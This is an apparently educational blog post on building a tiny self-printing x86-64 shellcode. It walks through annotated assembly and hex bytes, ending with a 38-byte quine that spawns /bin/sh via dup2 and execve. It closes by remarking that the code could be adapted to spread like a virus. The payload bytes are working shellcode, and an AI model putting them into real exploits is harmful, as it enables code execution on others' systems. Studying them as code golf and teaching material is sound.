Shellquine

Spoiler: Shellcodes can do lots of usefull tricks but can they reproduce themselves? Theoreticaly yes and we explain here how to do that in only 38 bytes.

Some time ago, I ended up reading an interresting article from David Madore’s personnal website where he explain what are those Quines (self replicating programs), how to build them (with example in C Language) and variation around this theme of cyber-reproduction.

The subject is not new (we speak of them since 1940) and examples have been published everywhere (since 1960) in every [serious] programming language. A kind of permanent tournament exist where the aim is to produce the smallest Quine ever. The absolute record is the following one1:

Save this content in a file (e.g. quine.txt) and you can then execute it as a PHP script (and even Python, Bash, Perl,…) to confirm it’ll write its own content on the standard output. Here are the command needed to achieve this exploit (under GNU/Linux):

$ echo -n "" > quine.php
$ php quine.txt > result.txt
$ diff quine.php result.txt
$ echo $?
0

Let’s come back to the subject. Our aim today is not to produce a smaller Quine but to complete the Big Familly of Quines for we did not find any example as shellcodes. We found lots of them in assembly but no version one could inject in another program.

Binary Quine

The nice thing about shellcode is that they are code which are directly written in binary. Following this principle, the source code of a shellcode is the binary code itself. A Quine in the form of a shellcode will thus print itself.

The idea is not so extravagant since one can find that kind of Quine in lot of other interpreted languages2. The following example uses PHP so the program display its own source code:

<?php readfile(__FILE__) ;

We thus only have to write the equivalent in binary. And since it’s not the most obvious thing to do3, we’ll begin with assembly code (annotated by C code). Here is how we could begin:

write:
    mov $0x01,       %rax # write(
    mov $0x01,       %rdi #   stdout,
    lea write(%rip), %rsi #   shellcode,
    mov $len,        %rdx #   sizeof(shellcode)
    syscall               # ) ;
exit:
    mov $0x3c,       %rax # exit(
    mov $0x00,       %rdi #   0
    syscall               # ) ;
    
    len = . - write

To paraphrase this code, the first bloc is a call to write() to… hum… write on the standard output the memory area that start at the shellcode’s address (relative to the next instruction) and of the same length aas the shellcode (computed by gnu as). The second bloc is a call to exit() to… hum… exit the program.

The translation of those instructions in binary is explained in our book (i.e. SYSCALL in page 17, MOV in page 35 and LEA (relative to RIP) in page 57). Here is the result where the assembly code is annotated by its binary translation (in hex).

write:
    mov $0x01,       %rax # 48 c7 c0 01 00 00 00
    mov $0x01,       %rdi # 48 c7 c7 01 00 00 00
    lea write(%rip), %rsi # 48 8d 35 eb ff ff ff
    mov $0x2e,       %rdx # 48 c7 c2 2e 00 00 00
    syscall               # 0f 05
exit:
    mov $0x3c,       %rax # 48 c7 c0 3c 00 00 00
    mov $0x00,       %rdi # 48 c7 c7 00 00 00 00
    syscall               # 0f 05

We can then convert this file into the binary shellcode with the two commands (i.e. sed then ssd), or use our makefile which automate the process.

$ make quine-binary.bin
sed -n "s/.*# *//p" quine-binary.s > quine-binary.hex
xxd -r -p quine-binary.hex > quine-binary.bin
rm quine-binary.hex

The Shellcode Quine is the file quine-binary.bin. A program written in binary which, once injected in another program, display its own code. Here is the commands to check that.

$ ./loader quine-binary.bin > out.bin
$ diff quine-binary.bin out.bin
$ echo $?
0

This first Quine works but is a bit long. 46 bytes! That’s just huge for the tiny thing it does. We should write one smaller.

Let’s begin by looking at the 5 MOV instructions that uses 4 bytes values, whose 3 high order bytes are zeros. It’s a waste of 15 bytes we’ll now avoid.

The first 4 instructions will be replaced by couple of PYSH/POP instruction (p. 352 of our book) and the last with a XOR (p. 351 ibid). Here is the result of this first optimization (couple of instructions are written on the same line to keep the idea that they made a single action).

write:
    push $0x01 ; pop %rax # 6a 01 58
    push $0x01 ; pop %rdi # 6a 01 5f
    lea write(%rip), %rsi # 48 8d 35 f3 ff ff ff
    push $0x1a ; pop %rdx # 6a 1a 5a
    syscall               # 0f 05
exit:
    push $0x3c ; pop %rax # 6a 3c 58
    xor  %rdi,       %rdi # 48 31 ff
    syscall               # 0f 05

Notes the thirst PUSH that does not push 0x2e as before (size of the previous shellcode) but 0x1a (size of this new version). For the same reason, the LEA instruction does not uses the same relative address for the portion of the code between the beginning and the syscall is shorter (13 bytes instead of 21).

Let’s continue with the XOR (that replaced a MOV). Its aim is to provide the exit code of the program (here 0 to tell everything was ok). If we delete the instruction, the value already in RDI will be used as the status code. Here we have a 1 (placed there with the second POP instruction). Semantically, this optimisation tells the operating system that the program encountered some problem. But nobody cares so we can get rid of 3 bytes.

write:
    push $0x01 ; pop %rax # 6a 01 58
    push $0x01 ; pop %rdi # 6a 01 5f
    lea write(%rip), %rsi # 48 8d 35 f3 ff ff ff
    push $0x17 ; pop %rdx # 6a 17 5a
    syscall               # 0f 05
exit:
    push $0x3c ; pop %rax # 6a 3c 58
    syscall               # 0f 05

The next optimizations will uses hypothesis on the environment. The last optimizations remain compatible with injection in whatever program. The next ones are made for our specific loader (cf. p. 27).

One of the big problem with shellcodes is to find where it have been loaded in memory. There are multiple techniques to solve it and this shellcode uses the address relative to RIP. Other usual techniques will works but they uses too much bytes. We’ll se we can bypass them when we find where the processor already store the shellcode’s address before executing it.

For that we need to look at the assembly code of the loader, produced by gcc. The following output have been made with GDB and shows that the address of the allocated page by mmap() is stored in the stack (local variable buffer) and then copied in another place in the stack (local variable function) and then in a register (RDX) used as the target of the function call (CALL instruction).

$ gdb loader
[...]
(gdb) disass main
[...]
   0x0000000000001202 <+169>:   call   0x1030 <mmap@plt>
   0x0000000000001207 <+174>:   mov    %rax,-0x18(%rbp)
[...]
   0x0000000000001219 <+192>:   mov    -0x18(%rbp),%rax
   0x000000000000121d <+196>:   mov    %rax,-0x20(%rbp)
   0x0000000000001221 <+200>:   mov    -0x20(%rbp),%rdx
   0x0000000000001225 <+204>:   mov    $0x0,%eax
   0x000000000000122a <+209>:   call   *%rdx
   0x000000000000122c <+211>:   leave
   0x000000000000122d <+212>:   ret

Instead of using LEA to compute the adress using 7 bytes, we can use a MOV instruction to copy the adress from RDX to RSI, using only 3 bytes. And since we want to spare the most bytes possible, we’ll prefer a couple of PUSH/POP instruction, using only 2 bytes.

write:
    push $0x01 ; pop %rax # 6a 01 58
    push $0x01 ; pop %rdi # 6a 01 5f
    push %rdx  ; pop %rsi # 52 5e
    push $0x12 ; pop %rdx # 6a 12 5a
    syscall               # 0f 05
exit:
    push $0x3c ; pop %rax # 6a 3c 58
    syscall               # 0f 05

If we keep using GDB, telling which values are in the registers when the shellcode is starting, we see that RAX and RDI contains zeros.

$ gdb loader
[...]
(gdb) b *main+209
(gdb) run quine-binary.bin
(gdb) info registers
rax            0x0                 0
[...]
rdi            0x0                 0
[...]

Instead of using a PUSH/POP to put 1 into them (with 3 bytes), we can have the same result with an INC instruction (since adding 1 to 0 produces 1). And the trick is that since this operation uses only the first bit, we do not have to do the operation on the full 64bits register, we can restrict the instruction to the first 8 or 32 bits (those variants of INC spare 1 byte).

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    push %rdx  ; pop %rsi # 52 5e
    push $0x10 ; pop %rdx # 6a 10 5a
    syscall               # 0f 05
exit:
    push $0x3c ; pop %rax # 6a 3c 58
    syscall               # 0f 05

Following the same idea, we know that after the first syscall, the RAX register will contain the number of written bytes. Instead of overwriting the value with 0x3c, let’s compute that value by adding the difference. We can ever do the arithmetic on the first 8 bits, using AL register which will spare 1 byte.

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    push %rdx  ; pop %rsi # 52 5e
    push $0x0f ; pop %rdx # 6a 0f 5a
    syscall               # 0f 05
exit:
    add  $0x2d,       %al # 04 2d
    syscall               # 0f 05

We can walk one step ahead… The exit() syscall is there to make the Quine cleanly exits. We use it as a form of respect for the operating system and its users but no rules impose to cleanly exit.

What could happens if we remove this syscall? The processor will execute the next instructions in memory. In the case of our loader, those bytes are zeros. Taken in couples, they encode an instruction that ask the processor to add zero into AL and execute the next instruction. Until the end of the allocated memory page. The next page isn’t allocated so when the processor will want to read the first instruction of that page, it’ll trigger a page fault and the system will end the program with a segmentation fault.

Who cares? The shellcode was able to execute itself, writing a copy on the standard ouput before crashing.

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    push %rdx  ; pop %rsi # 52 5e
    push $0x0b ; pop %rdx # 6a 0b 5a
    syscall               # 0f 05

So we ended up with a 11 bytes Quine in a form of a Shellcode. That’s 35 bytes less than the 46 bytes long initial version.

ShellQuine

One whispered in my earpiece that the previous code, even if it’s a valid Quine, is not a valid shellcode. In order to qualify for a shellcode, one need to launch a shell and no shell have been launched.

Yes, it’s true. And we’ll fix that by adding something David Madore calls an intro. A piece of code that have no role in the reproduction process of the Quine but which is there anyway because deep down, Eris likes humour.

It won’t be enough to just add a classic execve() shellcode after the call to write() because the rule is clear: the Quine must produce its content on the standard output. If we launch a shell, the standard output of our commands will pollute the standard output of the Quine which won’t be a Quine.

We’ll then insert between those syscalls a new syscall to dup2() to redirect the standard output of the shell (and of the commands) into the error output of the Quine. We’ll be then able to run the command we like, see their results without interfering with the Quine’s output.

The following code shows the instructions of this new Quine. Here the assembly is annotated by its translation to see the amount of new bytes inserted. The two new blocs (dup2() and execve()) are taken from the book (p. 148 and 78).

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    mov  %rdx,       %rsi # 48 89 d6
    push $0x4b ; pop %rdx # 6a 4b 5a
    syscall               # 0f 05
dup2:
    mov $0x21,       %rax # 48 c7 c0 21 00 00 00
    mov $0x02,       %rdi # 48 c7 c7 02 00 00 00
    mov $0x01,       %rsi # 48 c7 c6 01 00 00 00
    syscall               # 0f 05
execve:
    mov $0x3b,       %rax # 48 c7 c0 3b 00 00 00
    lea arg0(%rip),  %rdi # 48 8d 3d 12 00 00 00
    push $x00000000       # 68 00 00 00 00
    push %rdi             # 57
    mov %rsp,        %rsi # 48 89 e6
    mov $0,          %rdx # 48 c7 c2 00 00 00 00
    syscall               # 0f 05
arg0:
    .string "/bin/sh"     # 2f 62 69 6e 2f 73 68 00

This first version launching a shell takes 74 bytes. To make it smaller, we’ll first apply the same techniques as the beginning of this article to replace 6 MOV that takes too much place and replace them with the following equivalents:

The following code shows the result of those optimizations. Notes that, as before, we need to adapt the shellcode’s size (0x31 bytes) and relative address of arg0 (at 0x0d).

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    push %rdx  ; pop %rsi # 52 5e
    push $0x31 ; pop %rdx # 6a 31 5a
    syscall               # 0f 05
dup2:
    sub  $0x10,      %al  # 2c 10
    push %rdi             # 57
    inc              %edi # ff c7
    pop              %rsi # 5e
    syscall               # 0f 05
execve:
    add $0x3a,       %al  # 04 3a
    lea arg0(%rip),  %rdi # 48 8d 3d 0d 00 00 00
    push $x00000000       # 68 00 00 00 00
    push %rdi             # 57
    push %rsp ; pop %rsi  # 54 5e
    push $0x0 ; pop %rdx  # 6a 00 5a
    syscall               # 0f 05
arg0:
    .string "/bin/sh"     # 2f 62 69 6e 2f 73 68 00

This second version is 49 bytes long (we spare 25 bytes, 4 per MOV in average). It’s a good result but we can walk further by applying the following techniques.

Relative address. Using the relative address with RIP is usefull (direct and readable) but it costs somes bytes. 7 bytes for the instruction and 8 for the string making a total of 15 bytes.

The following table list available techniques (and their page number in our book) to get the address of the arg0 string in the RDI register and their costs. Some of them make the situation worst (e.g. pushing the data or the classical jmp-call-pop) and other make it better. In our case, the best case is when using a SYSCALL then a LEA relative to RCX.

Technique Cost
Empiler la chaîne (p. 54) 13
Adresse relative à RIP (p. 58) 15
CALL par dessus la chaîne (p. 62) 14
JMP / CALL / POP (p. 64) 16
CALL .+5 / POP / ADD (p. 69) 16
SYSCALL puis relatif à RCX (p. 78) 12

Use(less) argv. When calling execve(), the second parameter (argv) should contain the address of an array containing the parameters (addresses to the corresponding strings). But as it is explained in the man pages, the Linux Kernel accept to get a NULL value.

On Linux, argv and envp can be specified as NULL. In both cases, this has the same effect as specifying the argument as a pointer to a list containing a single null pointer. Do not take advantage of this non‐standard and nonportable misfeature! On many other UNIX systems, specifying argv as NULL will result in an error (EFAULT).

man execve

As suggested by the documentation, we’ll thus use this misfeature and put a zero in this parameter and spare the building of argv on the stack. With a XOR (3 bytes in 64 bits) but since the 32 high order bits of RSI are already zeros, we’ll use the 32 bits version, using only 2 bytes.

Zeroing RDX. The classical technique to put zero in a register (using XOR) usually takes 3 bytes. But for RDX, we have a specific trick using another instruction: CLTD4 which extend the sign bit of RAX into RDX. Since RAX contains a positive value, its sign bit is zero and RDX will be filled by zeros.

The 64 bits version uses 0x99 opcode after the REX.W prefix. Wich need 2 bytes instead of 3. But in our case, RAX and RDX only contains 32 bits values (RAX contains the syscall number and RDX contains 1). We can get rid of the REX.W prefix, making the operation on the low 32 bits (so this is the sign bit of EAX which is extended in EDX) and get the same result. Using only one byte.

The following code shows this new step. Notes the size and relative addresses must be updated to adapt to this new shorter code.

write:
    inc              %eax # ff c0
    inc              %edi # ff c7
    push %rdx  ; pop %rsi # 52 5e
    push $0x26 ; pop %rdx # 6a 26 5a
    syscall               # 0f 05
dup2:
    sub  $0x05,      %al  # 2c 05
    push %rdi             # 57
    inc              %edi # ff c7
    pop              %rsi # 5e
    syscall               # 0f 05
execve:
    add $0x3a,       %al  # 04 3a
    lea 0x0b(%rcx),  %rdi # 48 8d 79 0b
    xor %esi,        %esi # 31 f6
    cltd                  # 99
    syscall               # 0f 05
arg0:
    .string "/bin/sh"     # 2f 62 69 6e 2f 73 68 00

This final version uses 38 bytes. 11 less than the intermediate version and 36 less than the initial one.

And after

As often happens, this shellcode has no true use case. I can not find any context whare you’ll ever need to inject a shellcode that displays its own code to the standard output. Except for the fun or to learn. And that’s why making such shellcode is a form of Art.

But one only need small changes to transform this shellcode so it inject itself in another program, in another machine. The copies will execute the same actions and it’ll spread like a virus…